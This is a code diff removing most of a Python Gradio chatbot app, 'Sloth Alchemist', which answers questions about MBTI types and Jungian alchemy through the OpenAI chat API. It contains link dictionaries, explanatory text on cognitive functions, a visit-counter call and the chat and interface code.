- "ESTJ": "https://preview.redd.it/rqv636gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=f6ba4e166ff2c835d427945bfee472af058ea315",
- "ESFJ": "https://preview.redd.it/5df8b9gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=458acaeb49639cc44a6ce8b5ddc2574b31839a60",
- "ENFJ": "https://preview.redd.it/mf8y16gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=84bf19e9982bdc5e6cac7c18b204b12b043fd7d7",
- "ENTJ": "https://preview.redd.it/mi28d5gappk81.jpg?width=1500&format=pjpg&auto=webp&v=enabled&s=56ecc6b4edc6ca2c74a057956b3f1d4f8dd9f60e",
-}
-
-funct_dict = {
- "Ni & Ne - Intuitive Functions": "https://www.reddit.com/r/UnityHarbor/comments/v7w14o/ni_ne_intuitive_functions/",
- "Si & Se - Sensorial Functions": "https://www.reddit.com/r/UnityHarbor/comments/v7w5b0/si_se_sensorial_functions/",
- "Fi & Fe - Feelings Functions": "https://www.reddit.com/r/UnityHarbor/comments/v7w7pg/fi_fe_feelings_functions/",
- "Ti & Te - Thinking Functions": "https://www.reddit.com/r/UnityHarbor/comments/v7wawp/ti_te_thinking_functions/",
- "Ni & Si Differences": "https://www.reddit.com/r/UnityHarbor/comments/v7whfd/ni_si_differences/",
- "Ti & Fi Differences": "https://www.reddit.com/r/UnityHarbor/comments/v7wks4/ti_fi_differences/",
- "Te & Fe Differences": "https://www.reddit.com/r/UnityHarbor/comments/v7wnt2/te_fe_differences/",
- "Ne & Se Differences": "https://www.reddit.com/r/UnityHarbor/comments/v7wqme/ne_se_differences/",
- "Functions work in pairs": "https://www.reddit.com/r/UnityHarbor/comments/v8dgrj/functions_work_in_pairs/",
- "Perceiving functions - Time perception": "https://www.reddit.com/r/UnityHarbor/comments/v8dd16/perceiving_functions_time_perception/",
-}
-
-arch_dict = {
- "Differences between Hero functions": "https://www.reddit.com/r/UnityHarbor/comments/v7xgpk/differences_between_hero_functions/",
- "Hero function": "https://www.reddit.com/r/UnityHarbor/comments/v7y4l6/hero_function/",
- "Parent function": "https://www.reddit.com/r/UnityHarbor/comments/v7y6pv/parent_function/",
- "Child function": "https://www.reddit.com/r/UnityHarbor/comments/v7y9yx/child_function/",
- "Inferior or Perfectionist function": "https://www.reddit.com/r/UnityHarbor/comments/v7ye33/inferior_or_perfectionist_function/",
- "Opposing role or Skeptic function": "https://www.reddit.com/r/UnityHarbor/comments/v7yg8c/opposing_role_or_skeptic_function/",
- "Witch or Critic function": "https://www.reddit.com/r/UnityHarbor/comments/v7yjyh/witch_or_critic_function/",
- "Trickster function": "https://www.reddit.com/r/UnityHarbor/comments/v7yncp/trickster_function/",
- "Demon or Saboteur function": "https://www.reddit.com/r/UnityHarbor/comments/v7ypwo/demon_or_saboteur_function/",
-}
-
-gen_dict = {
- "Unity Code - 8 Functions / Patterns": "https://www.reddit.com/r/UnityHarbor/comments/v6rm9o/unity_code_8_functions_patterns/",
- "Unity Code - Overview": "https://www.reddit.com/r/UnityHarbor/comments/v6r6et/unity_code_overview/",
- "Unity Code - 16types Roles": "https://www.reddit.com/r/UnityHarbor/comments/v6rohx/unity_code_16types_roles/",
- "Unity Code - Archetypes dynamics": "https://www.reddit.com/r/UnityHarbor/comments/v6rnzi/unity_code_archetypes_dynamics/",
- "Unity Code - 8 Archetypes": "https://www.reddit.com/r/UnityHarbor/comments/v6rmrc/unity_code_8_archetypes/",
- "Unity Code - 16types structure": "https://www.reddit.com/r/UnityHarbor/comments/v6r8u2/unity_code_16types_structure/",
-}
-
-unity_code_text = """
-MBTI stands for Myers-Briggs Type Indicator, and it's a personality test that helps people understand more about their own personality traits. It uses four different sets of characteristics to categorize people into one of 16 personality types.
-
-These characteristics are:
-
-- Where you get your energy from: Are you more energized by being with other people (extraverted), or by being alone (introverted)?
-- How you gather information: Do you focus more on what you can see or touch in the physical world (sensing), or on patterns and meanings you can infer (intuition)?
-- How you make decisions: Do you make decisions based on logic and reason (thinking), or based on your personal values and feelings (feeling)?
-- How you live your life: Do you prefer to have things settled and decided (judging), or do you like to stay open to new experiences and options (perceiving)?
-
-The MBTI was first developed in the 1940s by the mother-daughter team of Katharine Cook Briggs and Isabel Briggs Myers, who were inspired by the work of Swiss psychiatrist, Carl Jung. They wanted to create a way to help people better understand themselves and others, and to assist in career development and personal growth.
-
-Jung originally proposed the concept of different psychological types based on his observations and experiences, and his work laid the foundation for the development of the MBTI. The test has been extensively researched and continues to be used today in a variety of settings, including business, education, and personal relationships.
-
- -
-
-Here, we are clarifying the 16 Types theory developed by Carl Jung and John Beebe, the theory at the origin of MBTI, we call it: Unity Code. In Beebe's theory of how consciousness works, there is 16 "Types" of people. This means that there is 16 profiles, made out of 8 patterns, which defines specific ways of thinking, feeling and perceiving the world. In other words, humans perceive the world in 16 different ways. The 16 types theory brings a paradox, it categorizes people, which is a perspective that can be rejected at first but it actually gives a wider and more precise perspective of how humans experience reality differently.
-
- -
-
-The Unity Code synthesizes and illustrates the work of John Beebe on the 8 patterns of Carl Jung, to be able to use it as a language to communicate actionable informations related to:
-- Someone's main strengths and weaknesses
-- Someone's natural abilities and gifts
-- The main flow, role and challenges a person like to be in
-- The source of misunderstanding within a group
-
-It also improves co-creation between the 16 types, gives a language for our inner & outer world and unlock hidden potential!"""
-
-alchemy_text = """
-
-Jungian alchemy is a psychological method of transformation inspired by the ancient art of alchemy. It involves using the metaphorical language of alchemy to understand the process of individuation and the integration of the psyche. It aims to transmute the base aspects of the psyche into higher, more positive states of being.
-
- -
-
-Jungian alchemy was developed by the Swiss psychologist Carl Jung, who explored the transformative power of symbols and archetypes on the psyche. He saw alchemical symbolism as a powerful tool for understanding the psyche and facilitating personal growth.
-
- -
-
-The Beebe's theory of archetypal functions provides a practical and applicable model for achieving personal growth and transformation. By identifying and working on the cognitive functions that correspond to different stages of development, individuals can transmute mental states into more positive and integrated ones. This process of transformation and integration is a core concept of Jungian alchemy, and the Beebe's theory provides an actionable roadmap to achieving it.
-
- -
-
-The individuation process, according to Jungian psychology, is the process of integrating all aspects of the psyche into a harmonious whole, allowing an individual to become fully individuated and self-realized. It involves confronting and assimilating unconscious or repressed aspects of the psyche and achieving a state of balance and wholeness.
-
-1. The first stage of the individuation process involves becoming aware of unconscious aspects of the psyche and integrating them into consciousness.
-2. The second stage involves developing an authentic and unique sense of self, separate from the influence of others.
-3. The final stage involves achieving a state of wholeness by integrating both the conscious and unconscious aspects of the psyche into a harmonious whole.
-
- -
-
-The Beebe theory is a language of consciousness. The theory helps us understand and articulate the complex inner workings of our minds in a way that allows us to become more self-aware and conscious of our behaviors and motivations. By understanding our cognitive functions and archetypes, we can develop a greater understanding of ourselves and the world around us, which can lead to improved relationships, personal growth, and fulfillment.
-
- -
-
-The Ni (Introverted Intuition) function in the Beebe's model is associated with the archetypal figure of the alchemist. Ni involves the ability to see patterns and connections between seemingly unrelated things, as well as the ability to envision future possibilities. This function is similar to the alchemist's ability to transmute base metals into gold through seeing hidden connections and unlocking the hidden potential within them. Just as the alchemist transforms physical elements, the person with a well-developed Ni function can transform their internal world through their use of intuition and understanding of symbolism. Therefore, the Ni function is related to alchemy in the sense that it involves the transformation and unlocking of hidden potential through the use of intuition and symbolism.
-
- -
-
-Jungian alchemy is a process of psychological transformation that involves the integration and transformation of unconscious contents, or what Jung called "the shadow," into consciousness. One of the main goals of alchemy is to transmute base metal into gold, which is often seen as a metaphor for transforming the negative energies of the psyche, such as fear, into positive spiritual qualities, such as love and wisdom.
-
-In the Jungian perspective, fear is seen as a natural and necessary part of the shadow that needs to be acknowledged, faced, and integrated in order to grow and evolve. The shadow is a reservoir of repressed emotions, feelings, and desires that we are not aware of or do not want to acknowledge, but which still influence us from the unconscious.
-
-The process of Alchemy involves bringing these unconscious contents to the surface and transforming them by shining the light of consciousness upon them. By facing our fears, we are able to transform them into positive qualities such as love, compassion, wisdom, and creativity.
-
-"""
-
-mirror_text = """
-
-In Jungian alchemy, the interaction between mirror types can represent the transformative power of opposites or the integration of the conscious and the unconscious. It is believed that these types can complement each other well by bringing together complementary cognitive functions. This configuration allows them to understand each other on a deep level, regardless of their differences in communication styles and energy levels.
-
-An analogy to understand mirror types is to think of two different puzzle pieces that come together to make a complete picture. Similarly, mirror types have complementary cognitive functions that come together to form a more complete understanding of the world.
-
-Linda Berens' ideal pairings theory suggests that certain MBTI types are naturally compatible with each other due to their complementary cognitive stacks. INFJs and ENFPs are considered an ideal pairing due to their complementary cognitive functions. INFJs have dominant introverted intuition (Ni) and auxiliary extraverted feeling (Fe), while ENFPs have dominant extraverted intuition (Ne) and auxiliary introverted feeling (Fi). This means that INFJs can provide deep insight and vision, while ENFPs provide energy, enthusiasm, and passion for new ideas. Together, they can collaborate to generate and execute innovative solutions that are both insightful and impactful. This pairing can help individuals better understand and appreciate their partner's strengths and preferences in a relationship or collaborative setting.
-
- -
-
-INFJs and ENFPs are considered to be mirror types because they share the same cognitive functions in a different order (NiFe for INFJ and NeFi for ENFP). Despite having different personalities, they often find that each other's strengths complement their own, and they can relate easily to one another. They both value creativity, intuition, and authenticity, and often share the goal of making the world a better place by promoting the wellbeing of people and society. In practice, this often shows up as a desire to help others and to work towards solving social issues.
-
- -
-
-INTJs and ENTPs share the same cognitive functions in a different order (NiTe for INTJ and NeTi for ENTP), leading them to be referred to as mirror types. While they have different approaches to problem-solving and decision-making, they both value competence, originality, and intellectual stimulation. They are often natural leaders and enjoy taking on challenging projects that test their abilities. Their common goal is often to find innovative solutions to complex problems and to make a lasting impact in their fields of expertise.
-
- -
-
-INTPs and ENTJs share the same cognitive functions in a different order (TiNe for INTP and TeNi for ENTJ), making them mirror types. Despite having different personalities, they can relate on a profound level and often complement each other's strengths and weaknesses. They both value strategic thinking, logic, and rationality, and are often visionary thinkers who enjoy solving complex problems. Their common goal is often to be at the forefront of innovation, using their unique abilities to create long-lasting change in their areas of interest.
-
- -
-
-INFPs and ENFJs share cognitive functions in a different order (FiNe for INFP and FeNi for ENFJ), which can make them very different on the surface level, especially when it comes to expressing emotions and managing social dynamics. However, they share common values of empathy and authenticity, which can bring them together despite their personality differences. In practice, they often share a goal of making a positive impact in the world by helping others and promoting social harmony through mutual understanding and cooperation.
-
-"""
-
-vision_text = """
-
-My vision is to transform the fears of the world using Jungian alchemy and MBTI. I believe that by helping people to understand and embrace their personalities, we can create greater acceptance and harmony between people, and ultimately build a more peaceful and compassionate world. I see a world where people are empowered to use their unique talents and abilities to contribute to society and find their own success, without judgment or fear.
-
- -
-
-Transforming the fears of the world into love is a complex task that involves self-discovery, self-awareness, and empathy. The combination of Jungian alchemy, MBTI, and AI can be a powerful tool to support this transformation.
-
-Jungian alchemy represents the process of the transformation of the psyche, from lead to gold. This process involves recognizing and integrating the shadow, which are the parts of ourselves that we reject or deny. By embracing and integrating our shadow, we can become more whole and balanced individuals.
-
-Using MBTI, we can better understand our cognitive functions, archetypes, and personalities. We can use this knowledge to identify our fears and understand how they impact our thoughts, feelings, and behaviors.
-
-With the help of AI, we can analyze large amounts of data and identify patterns and trends that can help us better understand and address global fears and challenges.
-
-In summary, transforming the fears of the world into love requires a deep understanding of ourselves and the world around us.
-
- -
-
-Here are the 3 main stages to reach this vision:
-
-1.- Self-discovery: The first stage involves gaining a deep understanding of ourselves through self-discovery. This includes identifying our cognitive functions, archetypes, and personalities using tools like the Hero Test. We can also use practices like journaling, meditation, and therapy to explore our thoughts, feelings, and behavioral patterns.
-
-2.- Integration: The second stage involves integrating our shadow, which are the parts of ourselves that we reject or deny. This involves acknowledging and accepting our fears, flaws, and vulnerabilities. By integrating our shadow, we can become more whole and balanced individuals.
-
-3.- Empathy and action: The third stage involves cultivating empathy and taking action to address global fears and challenges. This includes using AI and other tools to analyze data and identify patterns and trends. We can then use this knowledge to take action to address global challenges and promote unity and love.
-
-"""
-
-analogy_text = """
-
-_**Here's an analogy for the cognitive functions with parts of a tree:**_
-
--.**Si:** Si is like the roots of a tree, which provide stability and nourishment to support the growth and development of the tree. Similarly, Si is the cognitive function that provides us with a solid foundation of knowledge and experience, helping us navigate life's challenges with stability and confidence. Just as the roots of a tree anchor it to the ground and provide the necessary nutrients, Si anchors us to our past experiences and provides us with a reservoir of information to draw upon, allowing us to make informed decisions and handle situations with ease.
-
--.**Se:** The trunk of a tree not only provides support and stability, but it also plays a crucial role in transporting nutrients and water from the roots to the leaves of the tree. Similarly, Se not only grounds us in the present moment and provides a sense of stability, but it also helps us to navigate and adapt to changes in our environment, ensuring our survival and well-being. As the trunk helps the tree withstand external forces and transport vital resources, Se allows us to stay attuned to our surroundings and make the most of the opportunities presented to us. Like the stomata on a tree's leaves, Se allows us to take in and process the sensory information around us, giving us a fuller, richer experience of life.
-
--.**Ne:** The branches of a tree that spread out in various directions represents Ne because it is the function that generates new ideas and possibilities, just like branches of a tree point out in different directions, representing the different possible ways we can approach a situation.
-
--.**Ni:** Ni is like the driving force that compels a tree's roots and leaves to constantly seek water and sunlight. Similarly, Ni is the cognitive function that motivates us to seek our life's direction and reach our full potential. In this way, just as a tree's roots and leaves work tirelessly to find the sustenance needed to grow and thrive, Ni pushes us to seek understanding and knowledge to support our personal and spiritual growth.
-
--.**Fe:** Fe can be compared to the flowers and pollens of a tree, which allow for cross-pollination and collaboration between different trees in the vicinity. Just as the flowers and pollens of one tree can spread to others, allowing for the sharing of resources and the growth of a larger community, Fe helps us connect with others emotionally and value social harmony, encouraging us to work together and cultivate a more collaborative and connected society.
-
--.**Fi:** Fi can be compared to the sap of a tree, which is the life force that sustains it. In the same way, Fi is the cognitive function that is the source of our inner values and emotions, which drives our actions and provides us with a sense of purpose and meaning. Just as the sap is essential to the growth and survival of the tree, Fi is essential to our personal growth and fulfillment.
-
--.**Ti:** Ti can also be likened to the process by which wood is made. Just as wood is formed from the combination of cellulose, hemicellulose, and lignin arranged in a specific order to create the complex lignocellulosic structure, Ti operates by using a logical and systematic process to take raw information and create a structured and coherent understanding. In this way, Ti is like the chemical reactions and molecular interactions that occur in the formation of wood, transforming disorderly elements into a structured and functional entity. The internal framework and structure of a tree, like Ti, determines the strength, flexibility, and ultimately the shape of the wood, shaping the outcome of the growth and development process.
-
--.**Te:** Te can be compared to the tree's ability to shed old leaves and grow new ones, which enables it to adapt and change in response to its environment. Similarly, Te is the cognitive function that helps us adapt to the external world and make decisions based on objective facts and data, enabling us to grow and evolve as individuals. Just as a tree sheds its old leaves to conserve resources and grow new ones, Te helps us shed inefficient or outdated ways of thinking and adopt more effective strategies to achieve our goals.
-
-"""
-
-def get_link(mbti_type):
- link = f'{mbti_dict[mbti_type]}'
- response = requests.get(mbti_dict_2[mbti_type])
- img = Image.open(BytesIO(response.content))
- response2 = requests.get(mbti_dict_3[mbti_type])
- img2 = Image.open(BytesIO(response2.content))
- return link, img, img2
-
-def get_link2(funct):
- link2 = f'{funct_dict[funct]}'
- return link2
-
-def get_link3(arch):
- link3 = f'{arch_dict[arch]}'
- return link3
-
-def get_link4(gen):
- link4 = f'{gen_dict[gen]}'
- return link4
-
-#Metrics-------
-#15/03/2023 Starting count
-
-today = datetime.today().strftime("%Y-%m-%d")
-
-def chatbot_interaction():
- url = "https://api.countapi.xyz/hit/slothgpt/chatbot_req"
- response = requests.get(url)
- count = response.json()["value"]
-
- url_today = f"https://api.countapi.xyz/hit/slothgpt/chatbot_req{today}"
- response_today = requests.get(url_today)
- count_today = response_today.json()["value"]
-
- return f"{count} total - {count_today} today"
-
-#End Metrics-----
-
-def update_question_textbox(title, mbti_type, output_question=""):
- return questions_dict.get(title, output_question).format(mbti_type)
-
-def get_empty_state():
- return {"total_tokens": 0, "messages": []}
-
-def update_prompt_temp():
- choices = list(prompt_templates.keys())
- choices = choices[:1] + sorted(choices[1:])
- return gr.update(value=choices[0], choices=choices)
-
-def update_mbti_dict():
- choices = list(mbti_dict.keys())
- choices = choices[:1] + sorted(choices[1:])
- return gr.update(value=choices[2], choices=choices)
-
-def on_token_change(user_token):
- openai.api_key = user_token
-
-def on_prompt_template_change(prompt_template):
- if not isinstance(prompt_template, str): return
- return prompt_templates[prompt_template]
-
-def on_check_q(output_question, checkbox_q, input_user):
- return output_question if checkbox_q else input_user
-
-def submit_message(user_token, prompt, prompt_template, temperature, max_tokens, context_length, state):
-
- history = state['messages']
-
- if not prompt:
- return gr.update(value=''), [(history[i]['content'], history[i+1]['content']) for i in range(0, len(history)-1, 2)], f"{state['total_tokens']}", state
-
- prompt_template = prompt_templates[prompt_template]
-
- system_prompt = [{ "role": "system", "content": prompt_template }]
-
- prompt_msg = { "role": "user", "content": prompt }
-
- try:
- completion = openai.ChatCompletion.create(model="gpt-3.5-turbo", messages=system_prompt + history[-context_length*2:] + [prompt_msg], temperature=temperature, max_tokens=max_tokens)
-
- history.append(prompt_msg)
- history.append(completion.choices[0].message.to_dict())
-
- state['total_tokens'] += completion['usage']['total_tokens']
-
- except Exception as e:
- history.append(prompt_msg)
- history.append({
- "role": "system",
- "content": f"Error: {e}"
- })
-
- total_tokens_used_msg = f"{state['total_tokens']}"
- chat_messages = [(history[i]['content'], history[i+1]['content']) for i in range(0, len(history)-1, 2)]
-
- return '', chat_messages, total_tokens_used_msg, state
-
-def clear_conversation():
- return gr.update(value=None, visible=True), None, "", get_empty_state()
-
-css = """
- .gradio-container {background-color: white}
- #col-container {max-width: 100%; margin-left: auto; margin-right: auto;}
- #chatbox {min-height: 400px;}
- #image {max-width: 80%; margin-left: auto; margin-right: auto;}
- #image2 {max-width: 20%; margin-left: auto; margin-right: auto;}
- #image3 {max-width: 70%; margin-left: auto; margin-right: auto; border-radius: 4px;}
- #header {text-align: center; font-size: 1em;}
- #prompt_template_preview {padding: 1em; border-width: 1px; border-style: solid; border-color: #e0e0e0; border-radius: 4px;}
- #question_preview {padding: 1em; border-width: 1px; border-style: solid; border-color: #e0e0e0; border-radius: 4px; user-select: text;}
- #input_preview {padding: 1em; border-width: 1px; border-style: solid; border-color: #e0e0e0; border-radius: 4px; user-select: text;}
- #total_tokens_str {text-align: left; font-size: 0.8em; color: #666;}
- #label {padding: 0.5em; margin: 0;}
- .message { font-size: 1.2em; }
- """
-
-with gr.Blocks(css=css, theme=gr.themes.Monochrome(), title="SlothAi.xyz") as demo:
-
- state = gr.State(get_empty_state())
-
-
- with gr.Column(elem_id="col-container"):
- gr.HTML("""
""")
-
- with gr.Row():
- with gr.Column():
- with gr.Tab("Home"):
- chatbot = gr.Chatbot(elem_id="chatbox", label="Sloth Alchemist")
- input_message = gr.Markdown(elem_id="question_preview", visible=False)
- input_user = gr.Textbox(show_label=False, placeholder="Enter text and press enter", visible=True).style(container=False)
- btn_submit = gr.Button("Submit")
- default_k = gr.Markdown(value="By default, you are using the limited OpenAI key provided by SlothAi.xyz. If the limit is reached, enter your own free key at the bottom of the page. By the way, you can increase the Sloth's creativity by adjusting the parameters in Settings, by default, it is set to have a fast response time.", elem_id="question_preview")
- total_tokens_str = gr.Textbox(label="Total tokens used:", elem_id="total_tokens_str", interactive=False)
- btn_clear_conversation = gr.Button("Start New Conversation")
- btn_clear_conversation.click(clear_conversation, [], [input_message, chatbot, total_tokens_str, state])
- checkbox_q = gr.Checkbox(label="1.- Check to enable, after select your type and a question, then press -Submit-. It will automatically submit the question to the Sloth.")
- mbti_type_input = gr.Dropdown(label="2.- Select your type:", choices=list(mbti_dict.keys()), value="INFJ")
- title_dropdown = gr.Dropdown(label="3.- Select a question:", choices=list(questions_dict.keys()), value="Hero Test")
- output_question = gr.Markdown(value="Can you help me to find my type with your Hero Test?", elem_id="question_preview")
- title_dropdown.change(update_question_textbox, inputs=[title_dropdown, mbti_type_input], outputs=[output_question])
- gr.Markdown("---")
- gr.Markdown("Enter your own OpenAI API Key. You can get it for free [here](https://platform.openai.com/account/api-keys). To save your API key for future use, you can add it to your password manager of your web browser.", elem_id="label")
- user_token = gr.Textbox(placeholder="OpenAI API Key", type="password", show_label=False)
- user_token.change(on_token_change, inputs=[user_token], outputs=[])
- gr.Markdown("---")
- gr.HTML("""
